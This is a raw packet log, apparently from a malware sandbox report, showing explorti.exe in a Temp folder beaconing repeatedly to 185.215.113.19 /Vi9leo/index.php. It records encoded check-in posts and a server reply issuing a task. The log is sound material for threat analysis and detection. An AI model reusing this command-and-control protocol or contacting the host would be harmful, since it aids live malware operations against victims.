Jul 26, 2024 21:01:18.458245993 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:18.742748022 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49750	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:18.877486944 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:19.664840937 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:19.666033030 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:19.948873997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49751	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:20.077352047 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:20.856426001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:20.857820034 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:21.091538906 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:21.126024008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:21.389045954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49752	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:21.506738901 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:22.530749083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:22.531707048 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:22.562088966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:22.826242924 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49753	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:22.946367025 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:23.752993107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:23.753861904 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:24.008508921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49754	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:24.132105112 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:24.963284016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:24.963937998 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:25.226752043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49755	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:25.363684893 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:26.120713949 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:26.121455908 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:26.369308949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49756	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:26.488661051 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:27.284193039 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:27.285096884 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:27.536617041 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49757	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:27.660978079 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:28.482247114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:28.483134031 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:28.733627081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49758	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:28.847389936 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:29.605577946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:29.606386900 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:29.862056971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49759	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:29.972399950 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:30.809070110 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 21:01:30.814605951 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 42 32 42 37 37 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A79BB2B77B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 26, 2024 21:01:31.069098949 CEST	325	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 37 0d 0a 20 3c 63 3e 31 30 30 30 30 30 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 64 30 63 30 66 39 63 33 34 65 31 62 66 65 64 37 31 62 33 31 37 65 30 37 32 36 62 33 35 66 66 32 39 37 63 66 62 34 65 63 65 36 62 35 64 66 37 37 39 33 34 63 30 33 61 65 34 36 66 30 35 38 35 64 30 33 35 39 39 39 63 38 65 31 30 62 61 36 65 32 63 33 30 33 37 63 61 63 36 66 33 35 66 34 31 64 38 65 39 31 37 30 64 61 36 61 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 87 <c>1000009001+++b5937c1ad0c0f9c34e1bfed71b317e0726b35ff297cfb4ece6b5df77934c03ae46f0585d035999c8e10ba6e2c3037cac6f35f41d8e9170da6a#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49762	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:35.113809109 CEST	182	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000009001&unit=246122658369
Jul 26, 2024 21:01:35.996160984 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49763	185.215.113.19	80	8160	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 21:01:36.114119053 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 21:01:37.027251959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 19:01:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
